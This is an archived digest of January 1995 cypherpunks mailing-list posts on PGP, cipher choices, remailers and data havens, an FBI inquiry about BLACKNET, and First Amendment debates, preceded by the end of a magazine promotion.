digital signatures and the web of trust.

While Keep Out is primarily a paper magazine, the text of each issue
is released electronically to make sure the information is
disseminated widely.  This information is too important to limit it
to those who can afford a subscription.

I am sending this message instead of posting the full text of Keep
Out because the electronic edition contains the same commercial
advertisements that the paper version does.  It would be
inappropriate to post it here.

To encourage people to subscribe, and to ensure that Keep Out remains
solvent, the electronic edition is released roughly one month after
the paper version.

It seems to be the lot of new magazines to have deadline troubles.
Keep Out has unfortunately been no exception.  The second issue of
Keep Out was released quite late.  To bring the magazine's date of
issue back in touch with reality, the next issue (Volume 2, Number
1) will be dated March/April, and will be released in paper form on
February 27.

For that issue, we are working on a review of steganography software
(programs for hiding data in sound and picture files), an in-depth
report on Tempest technology (which allows an eavesdropper to view
your computer screen from a distance without using wires), a story
telling the current state of the government's Clipper (wiretap) Chip
initiative, and a continuation of our PGP for beginners' series.

To receive a free, sample issue of Keep Out, with no strings
attached, simply send your postal address to one of the addresses
below.  You will receive a copy of the next issue when it is mailed
out.  Keep Out's mailing list is completely confidential.  No
information about you will be released for any reason, except for
court orders, of course.

Subscriptions to Keep Out are $15 a year for six issues in the U.S.
and Canada, $27 elsewhere.  Back issues of the first two issues
(Volume 1, Numbers 1 and 2) are available at $7 each inside the U.S.
and Canada, $9 elsewhere.  U.S. funds only, please.  Unfortunately, we
can not accept credit cards, but checks and money orders payable to
"Keep Out" are welcome.


_______________
Contact Methods

Voice:       +1-818-345-8640

Fax/BBS:     +1-818-342-5127

Internet:    keep.out@sprawl.expressnet.org

Fidonet:     "Keep Out" at 1:102/903.0

Snail Mail:  Keep Out
             P.O. Box 571312
             Tarzana, CA 91357-1312
             USA



-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Call 818-345-8640 voice for info on Keep Out magazine.

iQCVAwUBLxL5+Wj9fvT+ukJdAQEeMgP8DG/x1JtkES7yEXyW67xOXiC/GPSn29ru
eeBgjp7Otqc4HVH46fJBe14zoSAfkgVuQUesOxtsVBUAVT6MS/SICr/i+Wrig6lS
k2LbokBD9GIihRVDG20XSkqfo3Uw7GBevFEJClCR7T5+rglnbVP8j+bXhumXBtAv
y8wU0yYwaD8=
=jZNP
-----END PGP SIGNATURE-----


... "Happiness is a warm puppy," said the anaconda.
--- Blue Wave/RA v2.12
--
|Fidonet:  John Schofield 11:310/12
|Internet: John.Schofield@sprawl.expressnet.org
|
| Standard disclaimer: The views of this user are strictly his own.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 11:20:14 PST
To: cypherpunks@toad.com
Subject: Storm Signals
Message-ID: <199501101924.OAA29627@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


On a social mailing list that I'm on, two things have been noticed in 
the last week:

	1: Somebody's roommate (a Green Beret) has been called back into
		6 months of active service.  He was not told where he'd 
		be.

	2: GPS fine positioning has been turned off.  This is only done
		during times of military operations (such as the 'invasion'
		of Haiti and the Iraq Massacre).  It's also been highly
		correlated with Pentagon pizza deliveries.

Anybody else have any clues as to what's up?

No overt crypto relevence, but some parallels to traffic analysis could be
easily drawn.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxKkJhNhgovrPB7dAQGCqwP/YzFcuNDCoUDY4a8O5YuVryBZ51HisN6m
PHwc5W2bmwXx8LLQs1fOu8J9d3SFZM8l47bBj8EZCIvXatrUCHPVIqnBWfE30z8w
7uQRBn+eTtct/vs9MgPTGDk+mNWgDtYHL7TQ8vfypkYVgrlWH3pNbEs4+EkRv/5l
ayYaAPq3IoU=
=YUo1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxLe7CoZzwIn1bdtAQHEcgGAm0rMUiMy+5bUX419XmkLtHFXNUjvV8e0
1YylcQ5G9C/HlWXYZett0tudtpBUGZsS
=kfFB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bradley W. Dolan" <71431.2564@compuserve.com>
Date: Tue, 10 Jan 95 11:40:48 PST
To: <cypherpunks@toad.com>
Subject: Why is WELL down?
Message-ID: <950110193426_71431.2564_FHJ103-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


My favorite net access provider, the WELL, is down and I can't
get a straight answer from the normally frank WELL folks why.

Is there a net.guru out there that might have any insight into
whether this shutdown is technical or political?

Brad Dolan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@CSOS.ORST.EDU>
Date: Tue, 10 Jan 95 14:49:59 PST
To: cypherpunks@toad.com
Subject: Phil Zimmerman's Legal Defense Fund
Message-ID: <Pine.3.88.9501101452.A11712-0100000@CSOS.ORST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could somebody mail me the info on sending a contribution Phil 
Zimmerman's Legal fees related to the PGP issue?

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 10 Jan 95 12:25:13 PST
To: jamesd@netcom.com (James A. Donald)
Subject: Re: procmail: another question
In-Reply-To: <Pine.3.89.9501101110.A28938-0100000@netcom5>
Message-ID: <199501102026.PAA16836@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| On Tue, 10 Jan 1995, Adam Shostack wrote:
| > 	Procmail is a very versatile, relatively easy to use way of
| > processing mail.
| 
| "Relatively easy"  -- Relative to the usual venomous Unix 
| user hostile interface that is.   I use procmail, but my 
| local Unix guru does not, even though he has a clear need to do so.

	Its got a nasty learning curve; I held off for a long time
before making the leap.  What all mail filters need is better
integration with MUAs, so I can say "This message should have gone
into my cpunks-noise folder, fix the rules." Of course, doing that
really well is not trivial.

	Safe-tcl has a shorter learning curve, but I've spend enough
time that I don't want to switch without a payoff.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Tue, 10 Jan 95 13:34:06 PST
To: cypherpunks@toad.com
Subject: Crypto functions
Message-ID: <199501102139.QAA00961@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


What crypto functions are considered modern and usable?  The list I have
right now is:

RSA
IDEA
DES
3DES
RC4
RC5
BLOWFISH
MD4
MD5

(and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars
 with "flamingo".)

Pointers to code for any other schemes will be greatly appreciated.

Thanks,

	-- Todd

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxL+YSoZzwIn1bdtAQGmbgF+Il9/8OU3smhe+DqhKBX5a51N9H15/ElN
4ByTAiKfNjXu21HWyV29kSxEBofo5003
=j55J
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff A Licquia <jalicqui@firefly.prairienet.org>
Date: Tue, 10 Jan 95 14:44:56 PST
To: cypherpunks@toad.com
Subject: Re: MEETING: Jan. 14th Bay Area Cypherpunks Meeting
In-Reply-To: <ab3820b50302100417b7@DialupEudora>
Message-ID: <Pine.3.89.9501101616.A13420-0100000@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Ah, to be less locationally challenged!  Anyone got a plane ticket they 
can donate? :-)

I (and, I imagine, others) would highly appreciate a summary from some 
worthy soul fortunate enough to be there.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?)   |   Finger for PGP 2.6 public key
jalicqui@prairienet.org          |   Me?  Speak for whom?  You've got
licquia@cei.com (work)           |     to be kidding!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 10 Jan 95 13:44:15 PST
To: cypherpunks@toad.com
Subject: Re: HTTP and ID Verification
Message-ID: <199501102149.QAA01058@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Doc writes:
> Can anyone tell me what the URL for the site that displays all
> the identifying info it gets when you request it is?

One option is http://www.uiuc.edu/cgi-bin/printenv


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMAvioZzwIn1bdtAQGhxwF/VkjkXoQ/s6U85F90IqcUotmoHbCojLE9
Wmn+KPyoeIa6THpY/w3VGAV7ug5i5WZB
=PkPL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Tue, 10 Jan 95 17:04:20 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: FBI and BLACKNET
Message-ID: <Pine.HPP.3.91.950110164606.5992B-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


  I was just visited by the a humble servant of the FBI
inquireing what I knew of BLACKNET. They apparently believe it's
a possible network industrial sabbatoge (read Terrorism).

Although the person I spoke to was quite cordial and even bought me 
lunch (that's the way to win me over) I must really question
the intellegence (read IQ) and intellagence (read reconnasance)
of his superiors.

apparently whoever sent him his lead doesn't pay attention to the net
enough to know Blacknet was a hoax, and why did it take since august
for them to find me?


I explained to him the differece between a Cyperpunk and a hacker
explained what a joke it is to be prosicuting Mr. Zimmerman
and why the Government is in the wrong for trying to limit encrytion
strenght. Then I demonstrated the Internet and how to e-mail the prez
and FTP speaches of the Prez :)

(I know I know, act stupid so they volentere as much info as possible,
he let too many things slip, but still If I had his job I'd be following 
up things like this too)

--Syed Yusuf
(Cypherpunk and proud of it damnit!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 10 Jan 95 14:08:54 PST
To: "L. Todd Masco" <cactus@hks.net>
Subject: Re: Crypto functions
In-Reply-To: <199501102139.QAA00961@bb.hks.net>
Message-ID: <9501102208.AA26444@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"L. Todd Masco" says:
> What crypto functions are considered modern and usable?  The list I have
> right now is:
> 
> RSA
> IDEA
> DES
> 3DES
> RC4
> RC5
> BLOWFISH
> MD4
> MD5

I wouldn't use BLOWFISH. MD4 is flawed -- and its a hash function, not
a crypto function (as is MD5). RC5 is very, very new. RC4 hasn't been
well studied in the open literature yet, though it is quite promising.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 10 Jan 95 23:17:05 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501101924.OAA29627@bb.hks.net>
Message-ID: <4Rn4lKjqRCC3075yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199501101924.OAA29627@bb.hks.net>, you wrote:
> [BEGIN PGP SIGNED MESSAGE]
> [BEGIN PGP SIGNED MESSAGE]
>
> On a social mailing list that I'm on, two things have been noticed in
> the last week:
>
> 	1: Somebody's roommate (a Green Beret) has been called back into
> 		6 months of active service.  He was not told where he'd
> 		be.
>
> 	2: GPS fine positioning has been turned off.  This is only done
> 		during times of military operations (such as the 'invasion'
> 		of Haiti and the Iraq Massacre).  It's also been highly
> 		correlated with Pentagon pizza deliveries.
>
> Anybody else have any clues as to what's up?

Perhaps Bosnia?

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
   A fanatic is one who can't change his mind and won't change the subject.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Tue, 10 Jan 95 14:25:43 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
Message-ID: <199501102230.RAA01492@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- -----BEGIN PGP SIGNED MESSAGE-----


Well, by cryptographic I mean "interesting crypto-type functions," not
necessarily just reversible mappings.  As far as an encryption API is
concerned, hash functions are no different: a byte stream comes in, a
different byte stream comes out.

I ask because I'm starting to put together those GUCAPI function I was
talking about before the new year and defining the initial set of functions.

L. McCarthy noted that I didn't include sapphire, and I've included it
in the (trivially expandable) interface definition.  I'm more interested
in being inclusive than in excluding cryptographicall weak functions 
(and I don't feel that I'm qualified at this point to make the call between
what's weak and strong anyway).
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBLxLPixNhgovrPB7dAQEWZgP3eLGNg+X5oxIySLFaTRaZN5eHgS402S39
/6FsB2eiUhy0j7OOrd3OiMorQSJ+V/8UvyJUayUYlWBoTgC/zJn8Vry4zX0HWhRh
URv5IT3l3Q/8kFCBkjRMSS/2b3ya0s2gFUJMzEYz78JNpLOwjtm59svdjydTE+z2
bboLSy+H1A==
=1noA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMKeCoZzwIn1bdtAQHtGAGAzxBCONKibbY5cvv/7a/POL5mqRjDfQ7B
c7S0z6EJMyGFsGeWJrOVlCgVum0TPrTE
=Rcku
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 10 Jan 95 15:47:47 PST
To: ekr@eit.COM (Eric Rescorla)
Subject: Re: Pornography, What is it?
In-Reply-To: <9501101603.AA02337@eitech.eit.com>
Message-ID: <199501102342.RAA00418@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> >>
> >If this is so then everything I have read or seen misses this minor point
> >completely. Every press release, speech, etc. that I see uses the term
> >pornography, not obscenity. TV preachers, news anchors, newspapers, DA's,
> >etc. consistently use the term pornography. The state of Oregon specificaly
> >legalized pornography, not osbcenity. 
> >I think from a legal standpoint there is little difference between the two.
> 
> Not so. Obscenity is a class of speech which is completely unprotected
> by the First Amendment [*Note, I don't agree with this line of reasoning,
> but it's what the Supremes say.] I.e. you can simply ban obscenity,
> like child pornography. Pornographic material cannot be banned but
> can be regulated according to 'time place and manner'. Hence the
> zoning restrictions on Adult book stores.
>
I understand what you are saying, what I am saying is the distinction is not
used in practice. The bbs operator in Cali. that was busted in Tennessee was
busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
year olds account being operated by a oinkdroid.) If you can 'simply' ban
obscenity then why all the rucus? Simple, you can't ban it simply... or any
other way for that matter. As to your zoning restrictions, they change from
place to place and hence are not a hard and fast rule either. The bottem line
is that the distinction fostered by legal eagles is a straw man argument, it
is intended to distract from the real issue - freedom to do what  you want
unless you harm another or their property without their prior concent.
 
> >From a legal perspective, the difference between pornography and
> obscenity is defined by the Miller test. [This may have changed
> a bit in the past few years]. This states that in order for
> material to be obscene it must be:
> 
> 1. Devoid of any artistic or literary importance.
> 2. Appeal to a prurient interest. [i.e. be arousing].
> 3. Be patently offensive by contemporary community standards.
> 
> This isn't the exact wording, but it's the general idea.
> 
This test is a joke, if you apply it fairly then a man and his wife having
anal sex would qualify as obscene in many places (which it does in some states)
Also, the whole concept of community standards is unworkable. Whose community?
The reason so few  people get busted under the Miller test is that there really
are so few idiots out there who would fall for it.

> In practice, it's very hard to get anything declared obscene,
> hence the desire to regulate pornography strongly within the
> permitted bounds of the First Amendment.
>
The reason they want to regulate pornography is that it is a stepping stone to
a total ban. It is based on religous grounds and the issue really has little if
anything to do with Constitutional rights.
 
> -Ekr
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 14:45:00 PST
To: cypherpunks@toad.com
Subject: Re: QUERY: S/Keyish PGP?
Message-ID: <199501102249.RAA01602@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


I'm catching up on old mail...


In response to my query, 
Adam Shostack <adam@bwh.harvard.edu> wrote:
>
>| A quick question: Has anybody considered the possibility of hacking
>| something into PGP's password protection to allow an S/Key like access?
>
>	I thought of this, bounced it off a few people, none of whom
>caught the flaw.  When I got around to implementing it, I realized
>that for it to work, your key would have to be securely stored on your
>unix box without encryption.

I caught that.  What I was hoping for was something that would allow
a key to be use for a specific purpose once and only once by a given
passphrase.  Ideally, this could be done on a machine that was totally
insecure.

I didn't catch the fundamental flaw, though.  If the machine is
compromised the key can always be compromised by taking an image of the
previous state and replaying whatever passphrase was intercepted.

Bummer.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxLUPBNhgovrPB7dAQEn8gP8DrC3h9Dv21JGgg4Vsz/76gnUfnTJBPD+
PPyZ2gi2dzzQOVkYsxZBHQs7kRq6ZSANNbCfM5wY1GbBagZvv2gAPMx9bESudH+l
wtoFcZGH5Az85O+k6FhN/QsOjJq/PaHUbNMui1Q+QKrMqU4I/UGCJCxAVRP8/wfS
8rLKzm7TxTU=
=LxUH
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMPACoZzwIn1bdtAQH7DAF9EMimhI0J9JUN9bqaHhsz2opQXZSIQC+g
D32kU3ELjC58Y4Ig3e9fLLrPoGtTub85
=Uq/c
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 10 Jan 95 21:52:02 PST
To: jpb@gate.net
Subject: Re: Thoughts on Data Havens
Message-ID: <9501102319.AB01326@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:30 AM 1/10/95, jpb@gate.net wrote:
> ... Post a new PGP key and encrypted address block weekly to alt.data.havens,
>alt.2600, or a stegoed picture to alt.binaries.pictures.whatever.  If you
>are limiting usership, perhaps an autoencrypting majordomo list. ...

Still, messages intended for the DH could be identified by the publically 
known mailer address.  Some sort of protocol where each message to the 
remailer results in a new and different encrypted send-to block being 
returned to the sender would seem to be required.  Avoiding traffic analysis 
on these messages would require you to place a new and different encrypted 
reply-to on each message chunk.

> ...  It would also be a good idea to only allow DH
>commands to be executed if the encrypted (mandatory) control message arrived
>from another remailer account ...

I was assuming this--on the basis that the DH would not want its location 
know to the presumeably large number of clients.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 10 Jan 95 21:41:34 PST
To: ekr@eit.COM (Eric Rescorla)
Subject: Re: Pornography, What is it?
In-Reply-To: <9501102357.AA12620@eitech.eit.com>
Message-ID: <199501110033.SAA00514@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> You seem to have missed where I say that I don't agree with this
> line of reasoning. I tend to believe that the first amendment means
> what it says. (I.e. make no law.) But the fact of the matter is that
> the people who make the law think differently, right or wrong.
>
I understand, I just don't think most of the folks out there against porno 
are interested in constitutional rights. They don't see them as relevant to 
their day to day lives. You might call it a sort of cult of personality which
is using religion as the head.
 
Also, the 1st Amendment says that Congress shall make no law, it doesn't say
a damn thing about the states doing it. When I read this amendment what I  see
is the founding fathers saying it is up to each state to decide for themselves.

And since Congress is placed in charge of inter-state relations it is quite
simple to reduce this to mean that States may not apply their standards to 
other states because they would then be acting in the place of the federal
government.

> >I understand what you are saying, what I am saying is the distinction is not
> >used in practice. The bbs operator in Cali. that was busted in Tennessee was
> >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
> >year olds account being operated by a oinkdroid.)
> The key word here is 'minor'. Minor have nowhere near the rights
> that adults have. Try banning the sale of pornography to demonstrated
> adults. 
>
Yes, but at no time was it proved that a mindor DID d/l the file only that they
could. Big distinction to me. A oinkdroid did the d/l'ing by playing like the
14 year old. To me this is entrapment.  
>
 I think you misunderstand. The First Amendment places restrictions
> upon what the States may do. The States are free to make such
> laws or NOT. Some don't. Most do.
> 
The 1st. Amendment says nothing about what the states can do, only Congress.

> It's all very well and good to say such things, but this formulation
> of liberty has no reasonable basis in Constitutional Law. The
> Bill of Rights does not encode Mill's On Liberty, as much as you
> might like it to.
>
Then I suggest you read the 9th and 10th Amendment. The 9th says the states
will ALWAYS get the benefit of the doubt. The 10th says the federal government
will NEVER get it unless there is a Constitional Amendment.
 
> Huh? Obscenity has to do with freedom of speech, not action. It's
> an exception to the First Amendment, not to some general class
> of liberties. Depictions of anal sex are typically not considered
> obscene. The act of anal sex is often made illegal, but that's an
> entirely separate issue.
It is made illegal because it is considered obscene. You seem to be skirting
the issue here. And since when is speech not an act? There are a whole list
of things included in the freedom of speech issue (ie freedom of the press)
that clearly implies that speech is one kind of act.

> 
> >Also, the whole concept of community standards is unworkable. Whose community?
> The community passing the law.
Last time I checked such cases were tried by 12 peers, this hardly qualifies as
community by any definition. It is not like they take a vote of all the people
in the community of voting age (which they should).
> 
> 
> Look, you can make general arguments about the way that you think
> that your liberty should be, but the only legal basis you have
> for claims that you have the freedom to do something is the
> Bill of Rights. I'm arguing from that basis.
>
As am I. I base each and every one of my beliefs about how this government
is supposed to be run on that document and that document alone. It is not
the supreme law of the land for nothing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Wed, 11 Jan 95 00:22:42 PST
To: cypherpunks@toad.com
Subject: Re: January meeting with
Message-ID: <60.18618.6525.0C1C8733@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain



LE+> The following is a message from my lawyer, Phil Dubois.  He posted it
  +> to alt.security.pgp, and I thought I should post it here as well.  The
  +> message is signed with his key.
  +> 
  +>  --Philip Zimmermann
  +> 

LE+The aforementioned signed message from PKZ's lawyer message failed
  +signature check on my system, apparently because it contained a very
  +long text line which, somewhere along the way, was chopped into two
  +lines before it arrived in my mailbox.  


LE+The two lines as they appeared in my message (which failed signature
  +test) are:
 
 
Well, there it is.  Phil goes free.
 
                           -dlj. 

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * Gingrich, n. abbrev. :   "giving to the rich".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 10 Jan 95 17:10:14 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Returned mail: User unknown (fwd)
Message-ID: <199501110109.UAA03229@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of anonymous-remailer@shell.portal.com:
: 
: I want to propose that a change to more of a Snow Crash society
: with anarcho-capitalism as the norm is not necessarily being
: _caused_ by pressures listed above, but, rather, fit a grander
: historical destiny.  What we are seeing and will see in the
: 

Not necessarily to the EXTREME that Stephenson predicted, but I definitely
see alot of what he said already starting to happen.  Hell, look at the 
Burbclaves.  Lil' old Indiana, PA had their first drive-by shooting a
few months ago.  Some of the growing gang-warefare influence is starting to
spill over from Pittsburgh.  Once people get a little more frightened of
violence, the engineered community idea is going to explode.  Now take
that with private and corporate police forces and ... BINGO!  Snowcrash.

: Consider the possibility that the dissolution of large,
: centralized federal republics is also inevitable.  (The
: Frissel/Sandforth Optimists have been arguing this exact point.)
: 

The decentralizing effect of digital networks (or Webs a la Hakim Bey)
is pretty self evident.  One can easily extrapolate the effects of a
structure like the Internet, a structure that by nature routes around
any form of 'censorship' from above.

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxMZ/R0c4/pqJauBAQH8LwP+PrvNhKJVEzmhZVcuvkNMLmGWWgyflAlh
PxvR5BtJHBpE/oNqB3TVOywt9eJYeIV7L7BSboIFosEyqC4OEFS6WRTAJpWhPg8L
L9CdvhaDKubnTteBEtugEtU1HB3iJ+zRucJYUVit0bBwCimcqvr/aTMab7h4Yqw9
uKJPulSTg/w=
=jdlE
-----END PGP SIGNATURE-----



-----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 10 Jan 95 12:22:06 PST
To: cypherpunks@toad.com
Subject: Re: "safe" Internet access
Message-ID: <9501102021.AA04063@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> If you want to access the Internet in a way that doesn't reveal your
> physical location (much), buy access from Metricom.  They sell
> Internet access via radios.  A small part-15 (900Mhz) $500 radio modem


This seems to be one of these devices which use the celular phone
network. In Germany they are also available ("Modacom") and use the
D1/D2/E-Plus networks. These networks can localize a sender in many cases
with a precision of about 20-40 meters. Not the best way to keep the 
physical location secret...


Hadmut 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Tue, 10 Jan 95 18:52:33 PST
To: cypherpunks@toad.com
Subject: Why use plastic for remailers and DH?
Message-ID: <Pine.3.89.9501102139.A36230-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This point may have been raised before, but anyway, unless you're using a 
swiss-bank issued credit card for a numbered account (if that's at all 
possible), or a bogus name on the card, why would anybody want to use 
something as completely traceable as a credit card to pay for a remailer 
or a data haven?
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jurgen Botz <jbotz@orixa.mtholyoke.edu>
Date: Tue, 10 Jan 95 19:08:46 PST
To: jpb@gate.net
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <199501110308.WAA07340@orixa.mtholyoke.edu>
MIME-Version: 1.0
Content-Type: text/plain


jpb@gate.net wrote:
> Where can I get the Magic Money software?

I'm a bit behind, so sorry if others have already suggested this, but
you should need any digicash for this... stamps can be just big random
numbers.  Someone buys a books of stamps, you make 10 big random
numbers send them a copy and keep a copy on file.  After a message
comes through with a particular number you throw that number out.

Just like real stamps, and unlike money, they can be used only once.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philippe Nave" <nave@abacus.dw.att.com>
Date: Tue, 10 Jan 95 22:05:45 PST
To: cypherpunks@toad.com
Subject: Odd bits, minutinae...
Message-ID: <9501110606.AA21223@abacus.ewindows>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Would *I* abstract an internal communique for a bunch of
net.riffraff? Surely not - you must know me better than that...

[...stuff...]

Search done for  Message:  <<< BELL LABS NEWS >>>
- ---------------- 
>>> ENCRYPTION -- This week, Bell Labs reported development of the AT&T
Information Vending Encryption System (IVES), a security system that protects
commercial information services -- such as video on demand, home shopping and
banking -- and electronic news and alerting services.  Using chips designed by
Bell Labs and VLSI Technologies, IVES works on various networks including the
Internet, cable TV networks and direct satellite broadcasting.  The first
application of IVES is in set-top cable television boxes being built by AT&T
for Cablevision Systems Corp., the nation's fifth-largest cable service
provider.  By employing secure cryptographic addressing, IVES will assure that
only paying customers receive enhanced pay-per-view and video-on-demand
services.  "There have been effective attacks on most, if not all, video
encryption systems, despite highly sophisticated countermeasures," said Dr.
David Maher, chief scientist for AT&T Secure Communications Systems.  "Hackers
are dedicated and can be well funded.  Incentives are rising rapidly."

[...stuff...]
Dedicated? Definitely. Well-funded? Hmmm.
This item is something for your acronym-scan parsers; will
IVES become interesting? (If not IVES, what of CURRIER? Whoa-
it was a joke, officer - CURRIER and IVES, get it? Oh, shit.)

Search done for  Message:  <<< BELL LABS IN THE NEWS >>>
- ---------------- 
